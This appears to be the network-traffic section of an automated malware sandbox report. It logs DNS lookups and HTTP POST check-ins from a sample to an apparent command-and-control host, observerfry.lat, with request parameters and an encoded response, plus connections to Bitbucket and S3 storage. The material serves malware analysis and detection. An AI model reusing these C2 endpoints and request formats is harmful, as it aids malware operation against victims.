                                                                                                                                                                              Dec 23, 2024 08:09:04.149955988 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.149995089 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.149995089 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.150002956 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.156234980 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.156325102 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.156336069 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.156354904 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.156397104 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.162729025 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.162825108 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.162863970 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.162887096 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.162904024 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.169441938 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.169508934 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.169522047 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.169531107 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.169598103 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.175980091 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.176054955 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.176117897 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.176137924 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.176137924 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.176148891 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.176302910 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.182461023 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.182528973 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.182600021 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.182600021 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.182617903 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.183224916 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.183231115 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.188832998 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.188903093 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.188935041 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.188946962 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.188986063 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.234884977 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.234941006 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.281630039 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.338862896 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.338897943 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.338947058 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.338968039 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.339044094 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.339044094 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.339045048 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.339066982 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.339086056 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.339164972 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.345144033 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.345165014 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.345215082 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.345248938 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.345261097 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.345304012 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.348891020 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.348946095 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.349049091 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.349049091 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.349059105 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.349090099 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.349551916 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.603941917 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.624697924 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.990690947 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.990690947 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.990710974 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.990720034 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                              Dec 23, 2024 08:08:35.366293907 CET5014253192.168.2.101.1.1.1
                                                                                                                                                                              Dec 23, 2024 08:08:35.504230976 CET53501421.1.1.1192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:55.218497038 CET6064053192.168.2.101.1.1.1
                                                                                                                                                                              Dec 23, 2024 08:08:55.439575911 CET53606401.1.1.1192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:57.489223957 CET5165153192.168.2.101.1.1.1
                                                                                                                                                                              Dec 23, 2024 08:08:57.629029036 CET53516511.1.1.1192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:59.906259060 CET6523953192.168.2.101.1.1.1
                                                                                                                                                                              Dec 23, 2024 08:09:00.137119055 CET53652391.1.1.1192.168.2.10
                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                              Dec 23, 2024 08:08:35.366293907 CET192.168.2.101.1.1.10x9a9eStandard query (0)observerfry.latA (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 23, 2024 08:08:55.218497038 CET192.168.2.101.1.1.10xf7f7Standard query (0)observerfry.latA (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 23, 2024 08:08:57.489223957 CET192.168.2.101.1.1.10x7a1bStandard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 23, 2024 08:08:59.906259060 CET192.168.2.101.1.1.10x8a60Standard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                              Dec 23, 2024 08:08:35.504230976 CET1.1.1.1192.168.2.100x9a9eNo error (0)observerfry.lat104.21.36.201A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 23, 2024 08:08:35.504230976 CET1.1.1.1192.168.2.100x9a9eNo error (0)observerfry.lat172.67.199.72A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 23, 2024 08:08:55.439575911 CET1.1.1.1192.168.2.100xf7f7No error (0)observerfry.lat172.67.199.72A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 23, 2024 08:08:55.439575911 CET1.1.1.1192.168.2.100xf7f7No error (0)observerfry.lat104.21.36.201A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 23, 2024 08:08:57.629029036 CET1.1.1.1192.168.2.100x7a1bNo error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 23, 2024 08:08:57.629029036 CET1.1.1.1192.168.2.100x7a1bNo error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 23, 2024 08:08:57.629029036 CET1.1.1.1192.168.2.100x7a1bNo error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 23, 2024 08:09:00.137119055 CET1.1.1.1192.168.2.100x8a60No error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Dec 23, 2024 08:09:00.137119055 CET1.1.1.1192.168.2.100x8a60No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Dec 23, 2024 08:09:00.137119055 CET1.1.1.1192.168.2.100x8a60No error (0)s3-w.us-east-1.amazonaws.com52.217.67.100A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 23, 2024 08:09:00.137119055 CET1.1.1.1192.168.2.100x8a60No error (0)s3-w.us-east-1.amazonaws.com3.5.24.197A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 23, 2024 08:09:00.137119055 CET1.1.1.1192.168.2.100x8a60No error (0)s3-w.us-east-1.amazonaws.com52.217.64.124A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 23, 2024 08:09:00.137119055 CET1.1.1.1192.168.2.100x8a60No error (0)s3-w.us-east-1.amazonaws.com54.231.131.121A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 23, 2024 08:09:00.137119055 CET1.1.1.1192.168.2.100x8a60No error (0)s3-w.us-east-1.amazonaws.com3.5.12.254A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 23, 2024 08:09:00.137119055 CET1.1.1.1192.168.2.100x8a60No error (0)s3-w.us-east-1.amazonaws.com52.216.76.204A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 23, 2024 08:09:00.137119055 CET1.1.1.1192.168.2.100x8a60No error (0)s3-w.us-east-1.amazonaws.com3.5.31.106A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 23, 2024 08:09:00.137119055 CET1.1.1.1192.168.2.100x8a60No error (0)s3-w.us-east-1.amazonaws.com3.5.28.250A (IP address)IN (0x0001)false
                                                                                                                                                                              • observerfry.lat
                                                                                                                                                                              • bitbucket.org
                                                                                                                                                                              • bbuseruploads.s3.amazonaws.com
                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              0192.168.2.1049713104.21.36.2014437300C:\Users\user\Desktop\zLP3oiwG1g.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-23 07:08:36 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                              Host: observerfry.lat
                                                                                                                                                                              2024-12-23 07:08:36 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                              Data Ascii: act=life
                                                                                                                                                                              2024-12-23 07:08:37 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 23 Dec 2024 07:08:37 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: PHPSESSID=lseabovgdiar0u927osnmdh304; expires=Fri, 18 Apr 2025 00:55:16 GMT; Max-Age=9999999; path=/
                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bZ8alXBjT2lZ%2Fr8Ji5zfbmF9XrdxwVcuy%2BboXhdeR2zRo%2FxUfgKAXFGsJdTSL%2Bl4YRDRif6NbzGtbOjrDaRyCcNphz1ZxPXYqYLzFLPE3Y6L8gNRHkNpflXeWlE3aQXkOkU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8f66857b3a2a9e1a-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2000&min_rtt=1989&rtt_var=768&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1405873&cwnd=211&unsent_bytes=0&cid=9ef1ee9e0fe6e651&ts=747&x=0"
                                                                                                                                                                              2024-12-23 07:08:37 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                              Data Ascii: 2ok
                                                                                                                                                                              2024-12-23 07:08:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              1192.168.2.1049719104.21.36.2014437300C:\Users\user\Desktop\zLP3oiwG1g.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-23 07:08:38 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Content-Length: 53
                                                                                                                                                                              Host: observerfry.lat
                                                                                                                                                                              2024-12-23 07:08:38 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                                                                                                              2024-12-23 07:08:39 UTC1121INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 23 Dec 2024 07:08:39 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: PHPSESSID=8n7tkk2i129un6kkrf4thurik6; expires=Fri, 18 Apr 2025 00:55:18 GMT; Max-Age=9999999; path=/
                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=81hQLUIzqRKIARyamU8jS0bMOwR0DZoRvKzMEonKaRxZ4eeXS4ftVP5vBhBc7o%2FZRTFj45dza5zYAJhGUSl2%2FPeF6TKhqqzHxSOuwIEwfJkiUfjlU7o2eQXS6RywiAc9Er4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8f668587ab5c5e7e-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2176&min_rtt=2169&rtt_var=829&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=952&delivery_rate=1308243&cwnd=233&unsent_bytes=0&cid=1cdb63fd8d5b0446&ts=779&x=0"
                                                                                                                                                                              2024-12-23 07:08:39 UTC248INData Raw: 34 39 31 63 0d 0a 4e 76 4e 50 77 75 54 34 55 44 38 71 51 69 57 50 36 56 66 65 53 42 64 4a 30 71 2f 47 5a 65 6d 71 50 45 64 34 79 50 61 37 6a 31 42 4e 30 54 6e 67 33 73 78 38 48 56 6b 6e 42 37 57 64 4a 61 73 74 4f 32 75 7a 79 2b 52 66 6a 38 74 51 4e 42 33 6b 31 4d 33 69 63 67 79 56 4c 71 36 58 6e 58 77 64 54 7a 6f 48 74 62 49 73 2f 43 31 35 61 2b 69 4e 6f 77 2b 4c 79 31 41 6c 47 61 4f 5a 79 2b 4d 7a 58 70 38 6f 71 6f 47 62 4e 46 35 47 4c 30 44 71 6a 44 61 30 4a 6e 34 6b 75 73 4c 6b 53 63 76 50 52 6d 56 43 36 72 76 65 2b 7a 46 37 6b 6a 79 70 78 6f 56 38 52 41 67 6e 53 36 33 54 64 62 38 74 64 53 57 30 79 36 30 4e 67 63 4a 59 4a 42 79 69 68 74 4c 70 4f 46 36 52 4b 36 75 4c 6b 69 42 54 54 43 68 4c 37 49 59 32 2f 47 51 31 4c 4b 69 4e 2f 45
                                                                                                                                                                              Data Ascii: 491cNvNPwuT4UD8qQiWP6VfeSBdJ0q/GZemqPEd4yPa7j1BN0Tng3sx8HVknB7WdJastO2uzy+Rfj8tQNB3k1M3icgyVLq6XnXwdTzoHtbIs/C15a+iNow+Ly1AlGaOZy+MzXp8oqoGbNF5GL0DqjDa0Jn4kusLkScvPRmVC6rve+zF7kjypxoV8RAgnS63Tdb8tdSW0y60NgcJYJByihtLpOF6RK6uLkiBTTChL7IY2/GQ1LKiN/E
                                                                                                                                                                              2024-12-23 07:08:39 UTC1369INData Raw: 66 59 2b 6c 30 30 43 37 2b 5a 79 65 74 79 53 39 38 30 34 49 47 57 63 67 55 49 4b 45 76 6a 6a 6a 61 7a 4c 58 51 72 6f 73 4b 6b 42 49 50 41 57 69 38 56 70 5a 76 58 35 7a 56 63 6d 43 71 76 67 5a 49 30 55 6b 74 67 43 61 32 4d 4c 66 78 79 4e 51 75 67 7a 71 63 54 68 74 6b 65 4f 6c 53 7a 31 4e 37 68 63 67 7a 52 4b 36 36 48 6c 7a 4a 50 51 43 74 4d 36 4a 6b 2b 74 53 64 34 4b 37 33 48 71 77 53 4c 7a 31 51 76 46 61 43 51 31 4f 41 30 56 4a 46 74 37 73 61 64 4b 68 30 51 59 47 54 6f 6d 7a 4b 77 50 44 63 52 38 4e 4c 71 48 73 76 50 55 6d 56 43 36 70 7a 63 37 6a 46 66 6e 69 36 6f 6a 59 67 79 54 30 34 74 51 76 2b 4e 4d 4c 49 67 64 6a 6d 36 77 36 49 45 67 73 4e 58 49 42 32 75 31 4a 65 74 4e 55 7a 52 64 65 43 6e 6c 7a 6c 52 51 6a 64 48 72 5a 52 37 70 57 70 79 4a 2f 43 56 35
                                                                                                                                                                              Data Ascii: fY+l00C7+ZyetyS9804IGWcgUIKEvjjjazLXQrosKkBIPAWi8VpZvX5zVcmCqvgZI0UktgCa2MLfxyNQugzqcThtkeOlSz1N7hcgzRK66HlzJPQCtM6Jk+tSd4K73HqwSLz1QvFaCQ1OA0VJFt7sadKh0QYGTomzKwPDcR8NLqHsvPUmVC6pzc7jFfni6ojYgyT04tQv+NMLIgdjm6w6IEgsNXIB2u1JetNUzRdeCnlzlRQjdHrZR7pWpyJ/CV5
                                                                                                                                                                              2024-12-23 07:08:39 UTC1369INData Raw: 65 61 31 71 74 6a 4a 6d 31 63 6e 36 53 4f 61 4f 4d 32 41 64 65 52 69 35 41 2b 38 73 71 38 6a 4d 31 4c 4c 79 4e 2f 45 65 47 79 56 59 6a 43 4b 57 5a 32 75 4d 38 57 35 51 69 71 49 61 61 50 31 68 4d 4b 30 7a 75 68 6a 47 75 49 48 55 6a 74 63 79 75 44 63 75 47 48 69 49 43 36 73 79 5a 33 43 56 66 30 78 69 6a 69 4a 51 31 53 77 67 2f 43 66 54 4c 4d 72 42 71 4c 57 75 39 78 61 45 43 68 4d 6c 55 4b 78 2b 67 6d 4e 48 6a 4d 55 61 65 4b 61 43 4b 6b 6a 68 51 52 69 52 50 35 49 41 2b 75 69 70 30 49 66 43 44 35 41 43 54 69 41 5a 6c 4c 71 32 59 31 4f 4a 77 59 5a 49 6a 72 6f 47 4d 63 6b 49 47 4f 51 66 71 68 33 58 6b 61 6e 6b 69 73 4d 61 75 41 34 76 50 55 79 41 5a 72 5a 66 55 36 6a 68 61 6c 69 6d 73 6a 35 63 30 58 55 38 6b 51 76 2b 4f 50 4c 41 6d 4e 57 58 77 79 72 78 48 30 34
                                                                                                                                                                              Data Ascii: ea1qtjJm1cn6SOaOM2AdeRi5A+8sq8jM1LLyN/EeGyVYjCKWZ2uM8W5QiqIaaP1hMK0zuhjGuIHUjtcyuDcuGHiIC6syZ3CVf0xijiJQ1Swg/CfTLMrBqLWu9xaEChMlUKx+gmNHjMUaeKaCKkjhQRiRP5IA+uip0IfCD5ACTiAZlLq2Y1OJwYZIjroGMckIGOQfqh3XkankisMauA4vPUyAZrZfU6jhalimsj5c0XU8kQv+OPLAmNWXwyrxH04
                                                                                                                                                                              2024-12-23 07:08:39 UTC1369INData Raw: 36 73 79 5a 35 44 74 47 6e 79 4f 70 69 35 77 36 57 6b 59 74 54 4f 75 41 4d 72 73 73 65 43 4f 39 79 4b 63 47 6a 38 4a 4d 4a 68 47 67 6d 64 4f 74 66 42 53 57 4e 65 44 65 32 68 56 52 59 54 42 63 2f 35 31 31 6f 32 52 73 61 37 66 42 35 46 2f 4c 79 31 45 73 46 61 4b 63 31 75 49 32 57 70 63 72 72 59 4f 56 4f 45 39 41 4c 6b 72 6d 68 44 36 75 4b 6e 67 76 76 4d 6d 73 44 49 47 49 45 47 55 64 73 74 53 42 72 51 64 5a 6e 69 32 6a 6b 4e 6f 74 45 31 46 67 51 4f 48 4c 62 66 77 6d 65 79 75 2f 77 61 67 4d 67 38 6c 53 4b 78 32 76 6e 64 48 6c 49 46 57 56 4a 61 47 49 6c 54 4e 5a 54 53 56 44 36 6f 38 7a 73 32 6f 37 61 37 66 56 35 46 2f 4c 35 33 6b 51 57 49 75 75 6d 66 4a 38 54 64 45 71 72 4d 62 43 63 6c 46 4c 4c 45 2f 69 6a 54 79 77 49 48 77 67 76 4d 61 67 43 34 4c 4e 57 43 51
                                                                                                                                                                              Data Ascii: 6syZ5DtGnyOpi5w6WkYtTOuAMrsseCO9yKcGj8JMJhGgmdOtfBSWNeDe2hVRYTBc/511o2Rsa7fB5F/Ly1EsFaKc1uI2WpcrrYOVOE9ALkrmhD6uKngvvMmsDIGIEGUdstSBrQdZni2jkNotE1FgQOHLbfwmeyu/wagMg8lSKx2vndHlIFWVJaGIlTNZTSVD6o8zs2o7a7fV5F/L53kQWIuumfJ8TdEqrMbCclFLLE/ijTywIHwgvMagC4LNWCQ
                                                                                                                                                                              2024-12-23 07:08:39 UTC1369INData Raw: 2b 6f 37 52 70 38 67 72 34 36 53 4f 31 78 4d 4a 55 72 72 68 7a 2b 39 4c 58 73 6c 75 49 33 71 52 34 7a 51 48 6e 31 61 69 34 54 43 2f 79 52 5a 73 43 43 76 78 6f 56 38 52 41 67 6e 53 36 33 54 64 62 55 34 63 53 61 69 78 4b 4d 4a 68 4d 74 4d 4a 42 65 68 68 74 37 69 4e 6c 4f 64 4b 36 2b 41 6d 7a 64 58 52 43 64 43 35 6f 51 35 2f 47 51 31 4c 4b 69 4e 2f 45 65 6c 77 30 30 79 47 61 53 66 7a 2f 5a 79 53 39 38 30 34 49 47 57 63 67 55 49 49 30 7a 6d 6a 7a 57 77 4b 6e 45 6d 73 4e 2b 72 41 49 7a 42 56 54 63 51 72 5a 50 53 35 54 6c 62 6c 7a 2b 73 69 49 67 33 54 31 70 67 43 61 32 4d 4c 66 78 79 4e 52 32 33 33 62 51 45 79 66 6c 49 4a 67 79 68 6d 64 57 74 4c 52 71 49 62 61 65 4b 32 6d 6f 64 54 69 39 4f 37 6f 51 30 74 53 5a 34 4c 72 6e 49 70 51 47 50 77 6c 51 6c 48 4b 79 56
                                                                                                                                                                              Data Ascii: +o7Rp8gr46SO1xMJUrrhz+9LXsluI3qR4zQHn1ai4TC/yRZsCCvxoV8RAgnS63TdbU4cSaixKMJhMtMJBehht7iNlOdK6+AmzdXRCdC5oQ5/GQ1LKiN/Eelw00yGaSfz/ZyS9804IGWcgUII0zmjzWwKnEmsN+rAIzBVTcQrZPS5Tlblz+siIg3T1pgCa2MLfxyNR233bQEyflIJgyhmdWtLRqIbaeK2modTi9O7oQ0tSZ4LrnIpQGPwlQlHKyV
                                                                                                                                                                              2024-12-23 07:08:39 UTC1369INData Raw: 53 57 49 65 44 65 32 6a 46 61 53 79 46 4e 35 49 63 36 75 79 35 6e 49 62 66 66 70 51 61 41 78 56 49 6c 46 36 65 65 32 4f 51 2f 57 4a 77 71 70 34 6d 66 63 68 4d 49 4a 31 2b 74 30 33 57 64 4a 33 34 6e 36 35 66 6b 47 4d 58 52 48 69 49 57 36 73 79 5a 37 54 68 52 6d 79 43 6a 69 5a 6b 67 58 45 34 79 52 2b 43 42 4a 37 59 68 63 43 61 39 77 4b 63 42 6a 63 4e 53 4e 78 4f 71 6c 39 4b 74 66 42 53 57 4e 65 44 65 32 68 46 4b 58 69 70 41 34 5a 30 2b 76 53 6c 6a 4a 71 43 4e 36 6b 65 61 7a 30 39 6c 51 72 79 45 7a 75 6f 74 47 6f 68 74 70 34 72 61 61 68 31 4f 4b 55 48 71 6a 54 75 75 4c 33 4d 6b 76 38 53 74 41 34 50 4c 58 69 45 65 72 5a 48 61 34 54 6c 54 6b 69 4b 6b 6a 35 51 37 55 67 68 75 42 2b 71 54 64 65 52 71 56 44 43 7a 77 61 6c 48 6c 49 5a 48 5a 52 32 6d 31 49 47 74 50
                                                                                                                                                                              Data Ascii: SWIeDe2jFaSyFN5Ic6uy5nIbffpQaAxVIlF6ee2OQ/WJwqp4mfchMIJ1+t03WdJ34n65fkGMXRHiIW6syZ7ThRmyCjiZkgXE4yR+CBJ7YhcCa9wKcBjcNSNxOql9KtfBSWNeDe2hFKXipA4Z0+vSljJqCN6keaz09lQryEzuotGohtp4raah1OKUHqjTuuL3Mkv8StA4PLXiEerZHa4TlTkiKkj5Q7UghuB+qTdeRqVDCzwalHlIZHZR2m1IGtP
